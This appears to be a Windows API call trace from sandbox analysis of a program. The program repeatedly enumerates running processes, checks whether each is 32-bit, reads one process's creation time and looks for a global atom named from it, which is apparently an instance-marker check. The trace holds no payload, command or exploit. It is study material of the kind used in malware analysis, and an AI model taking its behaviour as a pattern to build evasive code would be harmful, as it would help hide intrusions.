	[0079.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.941] CloseHandle (hObject=0x224) returned 1
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.941] CloseHandle (hObject=0x224) returned 1
	[0079.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.942] CloseHandle (hObject=0x224) returned 1
	[0079.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.942] CloseHandle (hObject=0x224) returned 1
	[0079.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.942] CloseHandle (hObject=0x224) returned 1
	[0079.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.942] CloseHandle (hObject=0x224) returned 1
	[0079.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.942] CloseHandle (hObject=0x224) returned 1
	[0079.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.943] CloseHandle (hObject=0x224) returned 1
	[0079.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.943] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.943] CloseHandle (hObject=0x224) returned 1
	[0079.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.943] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.943] CloseHandle (hObject=0x224) returned 1
	[0079.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.943] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.943] CloseHandle (hObject=0x224) returned 1
	[0079.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.943] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.943] CloseHandle (hObject=0x224) returned 1
	[0079.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.943] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.943] CloseHandle (hObject=0x224) returned 1
	[0079.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.944] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.944] CloseHandle (hObject=0x224) returned 1
	[0079.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.944] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.944] CloseHandle (hObject=0x224) returned 1
	[0079.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.944] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.944] CloseHandle (hObject=0x224) returned 1
	[0079.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.944] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.944] CloseHandle (hObject=0x224) returned 1
	[0079.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.944] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.945] CloseHandle (hObject=0x224) returned 1
	[0079.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.945] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.945] CloseHandle (hObject=0x224) returned 1
	[0079.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.945] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.945] CloseHandle (hObject=0x224) returned 1
	[0079.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.945] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.945] CloseHandle (hObject=0x224) returned 1
	[0079.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.945] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.945] CloseHandle (hObject=0x224) returned 1
	[0079.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.946] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.946] CloseHandle (hObject=0x224) returned 1
	[0079.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.946] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.946] CloseHandle (hObject=0x224) returned 1
	[0079.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.946] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.946] CloseHandle (hObject=0x224) returned 1
	[0079.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.946] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.946] CloseHandle (hObject=0x224) returned 1
	[0079.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.946] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.946] CloseHandle (hObject=0x224) returned 1
	[0079.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.947] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.947] CloseHandle (hObject=0x224) returned 1
	[0079.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.947] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.947] CloseHandle (hObject=0x224) returned 1
	[0079.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.947] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.947] CloseHandle (hObject=0x224) returned 1
	[0079.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.947] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.947] CloseHandle (hObject=0x224) returned 1
	[0079.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.947] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.947] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.947] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.948] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.948] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.948] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.948] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.948] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.948] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.948] CloseHandle (hObject=0x224) returned 1
	[0079.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.948] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.948] CloseHandle (hObject=0x224) returned 1
	[0080.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0080.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.023] CloseHandle (hObject=0x224) returned 1
	[0080.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0080.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.023] CloseHandle (hObject=0x224) returned 1
	[0080.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0080.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.023] CloseHandle (hObject=0x224) returned 1
	[0080.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0080.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.023] CloseHandle (hObject=0x224) returned 1
	[0080.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0080.023] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.024] CloseHandle (hObject=0x224) returned 1
	[0080.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0080.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.024] CloseHandle (hObject=0x224) returned 1
	[0080.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0080.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.024] CloseHandle (hObject=0x224) returned 1
	[0080.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0080.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.024] CloseHandle (hObject=0x224) returned 1
	[0080.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0080.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.024] CloseHandle (hObject=0x224) returned 1
	[0080.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0080.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.024] CloseHandle (hObject=0x224) returned 1
	[0080.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0080.024] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.025] CloseHandle (hObject=0x224) returned 1
	[0080.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0080.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.025] CloseHandle (hObject=0x224) returned 1
	[0080.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0080.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.025] CloseHandle (hObject=0x224) returned 1
	[0080.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0080.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.025] CloseHandle (hObject=0x224) returned 1
	[0080.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0080.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.025] CloseHandle (hObject=0x224) returned 1
	[0080.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0080.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.025] CloseHandle (hObject=0x224) returned 1
	[0080.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0080.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.026] CloseHandle (hObject=0x224) returned 1
	[0080.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0080.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.026] CloseHandle (hObject=0x224) returned 1
	[0080.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0080.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.026] CloseHandle (hObject=0x224) returned 1
	[0080.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0080.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.026] CloseHandle (hObject=0x224) returned 1
	[0080.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0080.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.026] CloseHandle (hObject=0x224) returned 1
	[0080.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0080.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.026] CloseHandle (hObject=0x224) returned 1
	[0080.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0080.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.026] CloseHandle (hObject=0x224) returned 1
	[0080.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0080.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.027] CloseHandle (hObject=0x224) returned 1
	[0080.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0080.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.027] CloseHandle (hObject=0x224) returned 1
	[0080.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0080.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.027] CloseHandle (hObject=0x224) returned 1
	[0080.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0080.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.027] CloseHandle (hObject=0x224) returned 1
	[0080.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0080.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.027] CloseHandle (hObject=0x224) returned 1
	[0080.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0080.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.027] CloseHandle (hObject=0x224) returned 1
	[0080.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0080.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.028] CloseHandle (hObject=0x224) returned 1
	[0080.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.028] CloseHandle (hObject=0x224) returned 1
	[0080.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.028] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.028] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.028] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.029] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.029] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.029] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.029] CloseHandle (hObject=0x224) returned 1
	[0080.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0080.029] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.029] CloseHandle (hObject=0x224) returned 1
	[0080.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0080.104] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.104] CloseHandle (hObject=0x224) returned 1
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0080.104] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.105] CloseHandle (hObject=0x224) returned 1
	[0080.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
